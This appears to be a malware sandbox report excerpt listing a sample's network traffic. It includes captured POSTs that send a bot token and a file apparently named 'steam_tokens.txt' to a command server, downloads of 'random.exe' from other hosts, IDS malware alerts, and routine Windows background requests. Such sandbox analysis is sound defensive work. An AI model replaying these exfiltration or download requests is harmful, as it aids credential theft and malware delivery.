Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file"------KEBGHCBAEGDHIDGCBAEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="message"ybncbhylepme------HIIEGHJJDGHCAKEBGIJK--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 37 35 65 30 35 38 32 36 39 66 63 34 37 35 30 30 34 33 36 38 39 36 31 64 65 66 66 39 63 36 34 39 35 34 37 66 39 34 37 35 34 31 63 33 37 39 66 34 62 62 32 62 63 61 61 35 62 31 30 38 33 35 34 39 33 39 30 65 34 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"4675e058269fc475004368961deff9c649547f947541c379f4bb2bcaa5b1083549390e4f------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGIJDGCAEBFIIECAKFHI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 34 32 45 37 33 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B42E73B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49715 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49795 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49930 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50112 -> 31.41.244.11:80

Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.35.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.35.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.35.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.35.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.35.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.35.26
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.146

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA9CC60 PR_Recv,

0_2_6CA9CC60

Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064721Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=200115838ec0401d93f5c0cda96a48d3&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=29&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=29&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AATSg30lpHSLRv3aehdfAT8MZ688RmsQ4gUQaoZY2q3wD+8jNNygi1INCSyrrISFjo0VIDO5y5zrRh+zFyDleJLPRlGus5HVcMFEFybgivCjz4sj3l6K8z4MXQhehwDINxnGvo+60pbz1rQxBm4DlnmNnMZPdB9qjmNOuSAWmSMiU9OHgC9vRlo2RD3ulOiwmCsuGeI+d3Pc6nG3/QFBs6V0mK02lilXc54RzeYH9M9jqTFBLh3THUS5dlekrEAHzhUeZVO3Nc9p/kkT1rtgt02dSGWlaRkoatMA716aQKzPfOqScJUMDt8rGusiHEWj8c3D+VbosbJlrb7bP9XsEu6kQZgAAECMz9jTaRCQKmSzReJAGA4awAf40G6zqiiANgfGbIIOHqWCqI/t0Bhy0l7+B7ziWHgc7OLbI3jzqcqxh1mEadELkirHi0zONAYSz3po8n0Mr+X8lsxuS32eCFWdZ7wRUBXOuQTtUudT2BbDoFqqULuV/YnjIyxZ911SoqSOjKJZl2TIxHUasKI2esajm0tcmAoF+uqhM8sl7+fzm0tm08rWRGoxiZT4KW6TafJyomU+CjFkaMrSoBUdZbZiQ1Ll2RESdooaCspbgLB1gXz0y3+NzDS8f7fgCgfMgOjoOaOjS/U0T7gh+CSJFb2dSbq7KrMgt/FCFtMItdtFlZfHUiNUVF1pnXpfQm/BRD70+xwQ5yZtldx65eP2kgnCA8hTEx6j4f0F3v9WwRBuBXVcSQhgoa62Y6MbTPoW0l/d/zLrtS/UuPcYLZufDZpnzb7ASRZU9rZY8cZsDdK3mWqDyc3KrQVbDFMY0/LUTdYSgKi6RAHPl/tSEqerEe83qdTmwPyaxODdSbn7C6J3n1WxgiBaB9itSSvjeXBgBkYVfYRoaxDbmeYEOmFDm+SS3nYes4xGZitjUhNxBrbLbcqok4pasitcB&p=Cache-Control: no-cacheMS-CV: ObD2W+bkhEWq3SjB.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064721Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=70372c190de2461b9aff2bd68fb3764c&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=29&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=29&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AATSg30lpHSLRv3aehdfAT8MZ688RmsQ4gUQaoZY2q3wD+8jNNygi1INCSyrrISFjo0VIDO5y5zrRh+zFyDleJLPRlGus5HVcMFEFybgivCjz4sj3l6K8z4MXQhehwDINxnGvo+60pbz1rQxBm4DlnmNnMZPdB9qjmNOuSAWmSMiU9OHgC9vRlo2RD3ulOiwmCsuGeI+d3Pc6nG3/QFBs6V0mK02lilXc54RzeYH9M9jqTFBLh3THUS5dlekrEAHzhUeZVO3Nc9p/kkT1rtgt02dSGWlaRkoatMA716aQKzPfOqScJUMDt8rGusiHEWj8c3D+VbosbJlrb7bP9XsEu6kQZgAAECMz9jTaRCQKmSzReJAGA4awAf40G6zqiiANgfGbIIOHqWCqI/t0Bhy0l7+B7ziWHgc7OLbI3jzqcqxh1mEadELkirHi0zONAYSz3po8n0Mr+X8lsxuS32eCFWdZ7wRUBXOuQTtUudT2BbDoFqqULuV/YnjIyxZ911SoqSOjKJZl2TIxHUasKI2esajm0tcmAoF+uqhM8sl7+fzm0tm08rWRGoxiZT4KW6TafJyomU+CjFkaMrSoBUdZbZiQ1Ll2RESdooaCspbgLB1gXz0y3+NzDS8f7fgCgfMgOjoOaOjS/U0T7gh+CSJFb2dSbq7KrMgt/FCFtMItdtFlZfHUiNUVF1pnXpfQm/BRD70+xwQ5yZtldx65eP2kgnCA8hTEx6j4f0F3v9WwRBuBXVcSQhgoa62Y6MbTPoW0l/d/zLrtS/UuPcYLZufDZpnzb7ASRZU9rZY8cZsDdK3mWqDyc3KrQVbDFMY0/LUTdYSgKi6RAHPl/tSEqerEe83qdTmwPyaxODdSbn7C6J3n1WxgiBaB9itSSvjeXBgBkYVfYRoaxDbmeYEOmFDm+SS3nYes4xGZitjUhNxBrbLbcqok4pasitcB&p=Cache-Control: no-cacheMS-CV: ObD2W+bkhEWq3SjB.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwuDxv8+uh2Eo4S&MD=141vAK7p HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
